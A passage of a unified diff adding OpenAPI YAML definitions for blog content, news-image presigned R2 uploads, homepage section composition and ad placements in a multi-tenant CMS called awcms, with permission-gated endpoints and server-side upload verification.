+                  type: string
+                isActive:
+                  type: boolean
+                sortOrder:
+                  type: integer
+      responses:
+        "200":
+          description: Widget updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteWidget
+      summary: Soft delete a widget
+      description: Gated by blog_content.widgets.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Widget soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
   /api/v1/database/pool/health:
     get:
       operationId: getDatabasePoolHealth
@@ -7882,6 +10053,504 @@ components:
         createdAt:
           type: string
           format: date-time
+    BlogAdPlacement:
+      type: object
+      required:
+        - placementType
+      properties:
+        placementType:
+          type: string
+          enum:
+            - global
+            - widget
+            - post
+            - page
+        targetId:
+          type: string
+          format: uuid
+          nullable: true
+    BlogInternalTagLinkSettings:
+      type: object
+      required:
+        - enabled
+        - caseInsensitive
+        - disabledTagIds
+      properties:
+        enabled:
+          type: boolean
+        caseInsensitive:
+          type: boolean
+        disabledTagIds:
+          type: array
+          items:
+            type: string
+            format: uuid
+    BlogMenuItem:
+      type: object
+      required:
+        - id
+        - label
+        - linkType
+        - sortOrder
+      properties:
+        id:
+          type: string
+          format: uuid
+        parentItemId:
+          type: string
+          format: uuid
+          nullable: true
+        label:
+          type: string
+        linkType:
+          type: string
+          enum:
+            - post
+            - page
+            - url
+        targetId:
+          type: string
+          format: uuid
+          nullable: true
+        url:
+          type: string
+          nullable: true
+        sortOrder:
+          type: integer
+    BlogPage:
+      type: object
+      required:
+        - id
+        - tenantId
+        - title
+        - slug
+        - status
+        - visibility
+        - pageType
+        - locale
+        - createdAt
+        - updatedAt
+        - version
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        authorTenantUserId:
+          type: string
+          format: uuid
+        title:
+          type: string
+        slug:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        contentJson:
+          type: object
+        contentText:
+          type: string
+        status:
+          type: string
+          enum:
+            - draft
+            - review
+            - scheduled
+            - published
+            - archived
+        visibility:
+          type: string
+          enum:
+            - public
+            - private
+            - unlisted
+        featuredMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        locale:
+          type: string
+        pageType:
+          type: string
+          enum:
+            - standard
+            - landing
+            - legal
+            - system
+        parentPageId:
+          type: string
+          format: uuid
+          nullable: true
+        menuOrder:
+          type: integer
+        publishedAt:
+          type: string
+          format: date-time
+          nullable: true
+        scheduledAt:
+          type: string
+          format: date-time
+          nullable: true
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+        version:
+          type: integer
+    BlogPageWriteInput:
+      type: object
+      description: Shared shape for POST /api/v1/blog/pages and PATCH /api/v1/blog/pages/{id} (all fields optional on update).
+      properties:
+        title:
+          type: string
+        slug:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        contentJson:
+          type: object
+        contentText:
+          type: string
+        locale:
+          type: string
+        visibility:
+          type: string
+          enum:
+            - public
+            - private
+            - unlisted
+        featuredMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        pageType:
+          type: string
+          enum:
+            - standard
+            - landing
+            - legal
+            - system
+        parentPageId:
+          type: string
+          format: uuid
+          nullable: true
+        menuOrder:
+          type: integer
+    BlogPost:
+      type: object
+      required:
+        - id
+        - tenantId
+        - title
+        - slug
+        - status
+        - visibility
+        - locale
+        - createdAt
+        - updatedAt
+        - version
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        authorTenantUserId:
+          type: string
+          format: uuid
+        title:
+          type: string
+        slug:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        contentJson:
+          type: object
+        contentText:
+          type: string
+        status:
+          type: string
+          enum:
+            - draft
+            - review
+            - scheduled
+            - published
+            - archived
+        visibility:
+          type: string
+          enum:
+            - public
+            - private
+            - unlisted
+        featuredMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoImageMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        locale:
+          type: string
+        translationGroupId:
+          type: string
+          format: uuid
+          nullable: true
+        autoInternalTagLinksDisabled:
+          type: boolean
+        publishedAt:
+          type: string
+          format: date-time
+          nullable: true
+        scheduledAt:
+          type: string
+          format: date-time
+          nullable: true
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+        version:
+          type: integer
+        termIds:
+          type: array
+          items:
+            type: string
+            format: uuid
+    BlogPostWriteInput:
+      type: object
+      description: Shared shape for POST /api/v1/blog/posts (all fields required) and PATCH /api/v1/blog/posts/{id} (all fields optional, only present fields change).
+      properties:
+        title:
+          type: string
+        slug:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        contentJson:
+          type: object
+          description: "{ blocks: ContentBlock[] } — whitelisted block types only (paragraph, heading, list, quote, gallery, video_news); never raw HTML."
+        contentText:
+          type: string
+        locale:
+          type: string
+        visibility:
+          type: string
+          enum:
+            - public
+            - private
+            - unlisted
+        featuredMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoImageMediaId:
+          type: string
+          format: uuid
+          nullable: true
+          description: Explicit "use this image for social/SEO preview" override — takes priority over featuredMediaId.
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        termIds:
+          type: array
+          items:
+            type: string
+            format: uuid
+        translationGroupId:
+          type: string
+          format: uuid
+          nullable: true
+        autoInternalTagLinksDisabled:
+          type: boolean
+          description: Per-post opt-out of automatic internal tag linking.
+    BlogRevision:
+      type: object
+      required:
+        - id
+        - tenantId
+        - resourceType
+        - resourceId
+        - revisionNumber
+        - title
+        - status
+        - createdAt
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        resourceType:
+          type: string
+          enum:
+            - post
+            - page
+        resourceId:
+          type: string
+          format: uuid
+        revisionNumber:
+          type: integer
+        title:
+          type: string
+        contentJson:
+          type: object
+        contentText:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        status:
+          type: string
+        changeNote:
+          type: string
+          nullable: true
+        createdByTenantUserId:
+          type: string
+          format: uuid
+        createdAt:
+          type: string
+          format: date-time
+    BlogSettings:
+      type: object
+      properties:
+        blogTitle:
+          type: string
+          nullable: true
+        blogDescription:
+          type: string
+          nullable: true
+        defaultLocale:
+          type: string
+        defaultVisibility:
+          type: string
+          enum:
+            - public
+            - private
+            - unlisted
+        postsPerPage:
+          type: integer
+        seoDefaultTitle:
+          type: string
+          nullable: true
+        seoDefaultDescription:
+          type: string
+          nullable: true
+        rssEnabled:
+          type: boolean
+        sitemapEnabled:
+          type: boolean
+        contentQualityChecklistPolicy:
+          type: object
+        socialPreviewFallbackImageMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        socialPreviewContentImageFallbackEnabled:
+          type: boolean
+    BlogTerm:
+      type: object
+      required:
+        - id
+        - tenantId
+        - taxonomyType
+        - name
+        - slug
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        taxonomyType:
+          type: string
+          enum:
+            - category
+            - tag
+        parentId:
+          type: string
+          format: uuid
+          nullable: true
+        name:
+          type: string
+        slug:
+          type: string
+        description:
+          type: string
+          nullable: true
+    BlogTermWriteInput:
+      type: object
+      properties:
+        taxonomyType:
+          type: string
+          enum:
+            - category
+            - tag
+        parentId:
+          type: string
+          format: uuid
+          nullable: true
+        name:
+          type: string
+        slug:
+          type: string
+        description:
+          type: string
+          nullable: true
     BusinessScopeAssignment:
       type: object
       description: One business-scope assignment (Issue
@@ -7946,6 +10615,34 @@ components:
         updatedAt:
           type: string
           format: date-time
+    ContentQualityChecklistResult:
+      type: object
+      required:
+        - applicable
+        - passed
+        - blockers
+      description: notApplicableChecklistResult() when full-online R2-only mode is not active for the tenant (applicable=false, passed=true, blockers=[]) — otherwise a full evaluation.
+      properties:
+        applicable:
+          type: boolean
+        passed:
+          type: boolean
+        blockers:
+          type: array
+          items:
+            type: object
+            required:
+              - ruleId
+              - message
+            properties:
+              ruleId:
+                type: string
+              message:
+                type: string
+        warnings:
+          type: array
+          items:
+            type: object
     ModuleCatalogEntry:
       type: object
       properties:

--- a/openapi/awcms-public-api.openapi.yaml
+++ b/openapi/awcms-public-api.openapi.yaml
@@ -45,6 +45,12 @@ tags:
     description: Transactional, versioned domain-event outbox and dispatcher admin API — read-only inspection of outbox events and per-consumer deliveries (redacted payload projections only), permission-gated/reason-required/idempotent/audited replay of a dead-lettered delivery, and per-tenant pause/resume of a registered consumer.
   - name: Theming
     description: Tenant-selectable presentation (ADR-0034 Fase 3 — the first website module in the base). Select a trusted, reviewed, build-time theme and configure it by DATA only (design tokens, slot variants, media asset ids, section order, nav placement) — no uploaded code, no arbitrary templates. Every token value is validated by rejection against strict CSS grammars; published versions are immutable; publish/rollback/retire are ABAC-gated, idempotency-keyed, and audited.
+  - name: News Media
+    description: Direct-to-R2 presigned upload flow for news images (news_portal module, ported from awcms-mini) — create an upload session (server-generated object key + short-lived presigned PUT URL), finalize (real R2 GET + magic-byte MIME sniffing + server-side SHA-256 checksum, never a bare HEAD), and cancel a still-pending_upload session. R2 credentials are never exposed to the browser; only a scoped, expiring presigned URL is returned.
+  - name: News Portal Homepage Sections
+    description: Editorial homepage section composer (news_portal module) — tenant-scoped, RLS-protected CRUD for configurable homepage sections (headline, latest_posts, featured_posts, editor_picks, category_grid, gallery_block). config shape is validated per sectionType server-side; every referenced post/category/media object must already exist for the same tenant (and gallery_block media must be a verified R2 media object). sectionType is immutable after creation; reordering is just a patchable sortOrder field.
+  - name: News Portal Ad Placements
+    description: R2-only advertisement placement presets for the news portal (news_portal module) — tenant-scoped, RLS-protected CRUD for ads assigned to a fixed set of placement keys. mediaObjectId must reference a verified R2 media object belonging to the same tenant — never a local path or arbitrary external image URL. linkUrl is optional and may be external, but is validated server-side as an absolute http(s) URL only.
 paths:
   /api/v1/abac/policies:
     get:
@@ -5566,6 +5572,156 @@ paths:
           $ref: "#/components/responses/Unauthorized"
         "403":
           $ref: "#/components/responses/Forbidden"
+  /api/v1/media/news-images/upload-sessions:
+    post:
+      tags:
+        - News Media
+      summary: Create a direct-to-R2 presigned upload session for a news image
+      description: Gated by news_portal.media.create. Returns a `pending_upload` metadata row plus a short-lived presigned PUT URL scoped to exactly one server-generated object key. Raw R2 credentials are never exposed to the browser.
+      operationId: newsMediaUploadSessionsCreate
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/CreateNewsMediaUploadSessionRequest"
+      responses:
+        "200":
+          description: Upload session created — a `pending_upload` metadata row plus a short-lived presigned PUT URL.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/NewsMediaUploadSessionCreated"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "502":
+          description: News media R2 storage is not configured/enabled for this deployment.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/media/news-images/upload-sessions/{id}/cancel:
+    post:
+      tags:
+        - News Media
+      summary: Cancel a still-pending-upload session
+      description: Gated by news_portal.media.cancel. Transitions a `pending_upload` session to `failed`.
+      operationId: newsMediaUploadSessionsCancel
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Upload session cancelled (status `failed`).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/NewsMediaObjectItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Upload session is not `pending_upload` (already uploaded/verified/attached/failed).
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/media/news-images/upload-sessions/{id}/finalize:
+    post:
+      tags:
+        - News Media
+      summary: Finalize an upload session — real R2 GET + magic-byte MIME sniffing + server-side SHA-256 checksum (never a bare HEAD)
+      description: Gated by news_portal.media.verify. High-risk, requires Idempotency-Key. Verifies the object actually uploaded to R2 (HEAD for existence/real size, then a full GET), sniffs the MIME type from the object's real magic bytes, and computes a SHA-256 checksum server-side. A client-claimed `checksumSha256` is only a transport-corruption cross-check, never a substitute for the MIME sniff — HEAD alone can never promote a media object to `verified`.
+      operationId: newsMediaUploadSessionsFinalize
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: false
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/FinalizeNewsMediaUploadSessionRequest"
+      responses:
+        "200":
+          description: Object verified — media object status is now `verified` (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/NewsMediaObjectItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Upload session is not `pending_upload`, has expired (`UPLOAD_SESSION_EXPIRED`), or the Idempotency-Key was reused with a different request (`IDEMPOTENCY_CONFLICT`).
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: Uploaded object failed content verification (`UPLOAD_VERIFICATION_FAILED`). `error.details.reason` is one of `object_not_found`, `size_exceeded`, `mime_not_recognized`, `mime_not_allowed`, `mime_mismatch`, `checksum_mismatch`.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "502":
+          description: Unable to verify the uploaded object right now (R2 provider error/circuit breaker open) — retry shortly.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
   /api/v1/modules:
     get:
       operationId: listModuleCatalog
@@ -5798,6 +5954,364 @@ paths:
           $ref: "#/components/responses/Forbidden"
         "500":
           $ref: "#/components/responses/BadRequest"
+  /api/v1/news-portal/ad-placements:
+    get:
+      tags:
+        - News Portal Ad Placements
+      summary: List this tenant's ad placements (admin view)
+      description: Gated by news_portal.ad_placements.read.
+      operationId: newsPortalAdPlacementsList
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Ad placements.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      placements:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/AdPlacementItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - News Portal Ad Placements
+      summary: Create an ad placement (R2-only image, verified media object required)
+      description: Gated by news_portal.ad_placements.configure. `mediaObjectId` must reference a verified (`verified`/`attached`) R2 media object for this tenant.
+      operationId: newsPortalAdPlacementsCreate
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/AdPlacementCreateRequest"
+      responses:
+        "200":
+          description: Ad placement created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/AdPlacementItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "422":
+          description: mediaObjectId does not exist, does not belong to this tenant, is not a verified R2 media object, or is not an allowed mime type for the target placement.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/news-portal/ad-placements/{id}:
+    patch:
+      tags:
+        - News Portal Ad Placements
+      summary: Update an ad placement (media reference/link/rotation/schedule/active)
+      description: Gated by news_portal.ad_placements.configure.
+      operationId: newsPortalAdPlacementsUpdate
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/AdPlacementUpdateRequest"
+      responses:
+        "200":
+          description: Ad placement updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/AdPlacementItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "422":
+          description: mediaObjectId does not exist, does not belong to this tenant, is not a verified R2 media object, or is not an allowed mime type for the target placement.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+    delete:
+      tags:
+        - News Portal Ad Placements
+      summary: Soft-delete an ad placement
+      description: Gated by news_portal.ad_placements.configure.
+      operationId: newsPortalAdPlacementsDelete
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - reason
+              properties:
+                reason:
+                  type: string
+      responses:
+        "200":
+          description: Ad placement deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      id:
+                        type: string
+                        format: uuid
+                      deleted:
+                        type: boolean
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/news-portal/homepage-sections:
+    get:
+      tags:
+        - News Portal Homepage Sections
+      summary: List this tenant's homepage sections (admin view)
+      description: Gated by news_portal.homepage_sections.read.
+      operationId: newsPortalHomepageSectionsList
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Homepage sections.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      sections:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/HomepageSectionItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - News Portal Homepage Sections
+      summary: Create a homepage section
+      description: Gated by news_portal.homepage_sections.configure. `config` is validated per `sectionType`; every referenced post/category/media object must already exist for this tenant (and gallery_block media must be a verified R2 media object).
+      operationId: newsPortalHomepageSectionsCreate
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/HomepageSectionCreateRequest"
+      responses:
+        "200":
+          description: Homepage section created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/HomepageSectionItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: sectionKey is already in use for this tenant.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: config references content that does not exist, does not belong to this tenant, or (for gallery_block) is not a verified R2 media object.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/news-portal/homepage-sections/{id}:
+    patch:
+      tags:
+        - News Portal Homepage Sections
+      summary: Update a homepage section (title/config/sortOrder/isEnabled/schedule) — sectionType is immutable
+      description: Gated by news_portal.homepage_sections.configure.
+      operationId: newsPortalHomepageSectionsUpdate
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/HomepageSectionUpdateRequest"
+      responses:
+        "200":
+          description: Homepage section updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    $ref: "#/components/schemas/HomepageSectionItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "422":
+          description: config references content that does not exist, does not belong to this tenant, or (for gallery_block) is not a verified R2 media object.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+    delete:
+      tags:
+        - News Portal Homepage Sections
+      summary: Soft-delete a homepage section
+      description: Gated by news_portal.homepage_sections.configure.
+      operationId: newsPortalHomepageSectionsDelete
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - reason
+              properties:
+                reason:
+                  type: string
+      responses:
+        "200":
+          description: Homepage section deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum:
+                      - true
+                  data:
+                    type: object
+                    properties:
+                      id:
+                        type: string
+                        format: uuid
+                      deleted:
+                        type: boolean
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
   /api/v1/offices:
     get:
       operationId: listOffices
@@ -9991,6 +10505,177 @@ components:
         matchedPolicyVersion:
           type: integer
           nullable: true
+    AdPlacementCreateRequest:
+      type: object
+      required:
+        - placementKey
+        - name
+        - mediaObjectId
+      properties:
+        placementKey:
+          type: string
+          enum:
+            - header_banner
+            - below_headline
+            - homepage_middle
+            - homepage_bottom
+            - article_top
+            - article_middle
+            - article_bottom
+            - sidebar_top
+            - sidebar_middle
+            - sidebar_bottom
+            - category_archive_top
+            - search_result_top
+        name:
+          type: string
+        mediaObjectId:
+          type: string
+          format: uuid
+        linkUrl:
+          type: string
+          nullable: true
+        rotationMode:
+          type: string
+          enum:
+            - latest
+            - priority
+            - random_safe
+            - weighted
+          default: latest
+        priority:
+          type: integer
+          minimum: 0
+          default: 0
+        isActive:
+          type: boolean
+          default: true
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+    AdPlacementItem:
+      type: object
+      required:
+        - id
+        - tenantId
+        - placementKey
+        - name
+        - mediaObjectId
+        - rotationMode
+        - priority
+        - isActive
+        - createdAt
+        - updatedAt
+      additionalProperties: false
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        placementKey:
+          type: string
+          enum:
+            - header_banner
+            - below_headline
+            - homepage_middle
+            - homepage_bottom
+            - article_top
+            - article_middle
+            - article_bottom
+            - sidebar_top
+            - sidebar_middle
+            - sidebar_bottom
+            - category_archive_top
+            - search_result_top
+        name:
+          type: string
+        mediaObjectId:
+          description: Must reference a verified (`verified`/`attached`) R2 media object belonging to this tenant (`awcms_news_media_objects`) — never a local path or arbitrary external URL.
+          type: string
+          format: uuid
+        linkUrl:
+          description: Optional, possibly external, link — validated server-side as an absolute http(s) URL only.
+          type: string
+          nullable: true
+        rotationMode:
+          type: string
+          enum:
+            - latest
+            - priority
+            - random_safe
+            - weighted
+        priority:
+          type: integer
+          minimum: 0
+        isActive:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+    AdPlacementUpdateRequest:
+      type: object
+      properties:
+        placementKey:
+          type: string
+          enum:
+            - header_banner
+            - below_headline
+            - homepage_middle
+            - homepage_bottom
+            - article_top
+            - article_middle
+            - article_bottom
+            - sidebar_top
+            - sidebar_middle
+            - sidebar_bottom
+            - category_archive_top
+            - search_result_top
+        name:
+          type: string
+        mediaObjectId:
+          type: string
+          format: uuid
+        linkUrl:
+          type: string
+          nullable: true
+        rotationMode:
+          type: string
+          enum:
+            - latest
+            - priority
+            - random_safe
+            - weighted
+        priority:
+          type: integer
+          minimum: 0
+        isActive:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
     ApiError:
       type: object
       required:
@@ -10643,6 +11328,156 @@ components:
           type: array
           items:
             type: object
+    CreateNewsMediaUploadSessionRequest:
+      type: object
+      required:
+        - mimeType
+        - byteSize
+      additionalProperties: false
+      properties:
+        mimeType:
+          type: string
+          description: "Must be one of the deployment's configured NEWS_MEDIA_R2_ALLOWED_MIME_TYPES (default: image/jpeg, image/png, image/webp, image/gif — image/svg+xml is never allowed by default)."
+          example: image/jpeg
+        byteSize:
+          type: integer
+          minimum: 1
+          description: Claimed size in bytes — shape-only check against NEWS_MEDIA_R2_MAX_UPLOAD_BYTES; the real size is re-checked from R2 itself at finalize time.
+        originalFilename:
+          type: string
+          nullable: true
+          description: Stored as display-only metadata — never part of the server-generated object key.
+        altText:
+          type: string
+          nullable: true
+        caption:
+          type: string
+          nullable: true
+    FinalizeNewsMediaUploadSessionRequest:
+      type: object
+      additionalProperties: false
+      properties:
+        checksumSha256:
+          type: string
+          nullable: true
+          description: Optional. When supplied, compared against the checksum computed server-side from the bytes actually read from R2 — a transport-corruption check only, never a substitute for the server-side MIME sniff.
+          pattern: ^[0-9a-fA-F]{64}$
+          example: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
+    HomepageSectionConfig:
+      description: "Shape depends on sectionType — headline: {postId}; latest_posts: {limit?, categorySlug?}; featured_posts/editor_picks: {postIds: []}; category_grid: {categorySlugs: [], postsPerCategory?}; gallery_block: {mediaObjectIds: [], caption?}. Validated server-side per sectionType; every id/slug must already exist for the same tenant, and gallery_block's mediaObjectIds must each be a verified R2 media object."
+      type: object
+      additionalProperties: true
+    HomepageSectionCreateRequest:
+      type: object
+      required:
+        - sectionKey
+        - sectionType
+        - config
+      properties:
+        sectionKey:
+          type: string
+          pattern: ^[a-z0-9][a-z0-9_-]{0,63}$
+        sectionType:
+          type: string
+          enum:
+            - headline
+            - latest_posts
+            - featured_posts
+            - editor_picks
+            - category_grid
+            - gallery_block
+        title:
+          type: string
+          nullable: true
+        config:
+          $ref: "#/components/schemas/HomepageSectionConfig"
+        sortOrder:
+          type: integer
+        isEnabled:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+    HomepageSectionItem:
+      type: object
+      required:
+        - id
+        - tenantId
+        - sectionKey
+        - sectionType
+        - config
+        - sortOrder
+        - isEnabled
+        - createdAt
+        - updatedAt
+      additionalProperties: false
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        sectionKey:
+          type: string
+        sectionType:
+          type: string
+          enum:
+            - headline
+            - latest_posts
+            - featured_posts
+            - editor_picks
+            - category_grid
+            - gallery_block
+        title:
+          type: string
+          nullable: true
+        config:
+          $ref: "#/components/schemas/HomepageSectionConfig"
+        sortOrder:
+          type: integer
+        isEnabled:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
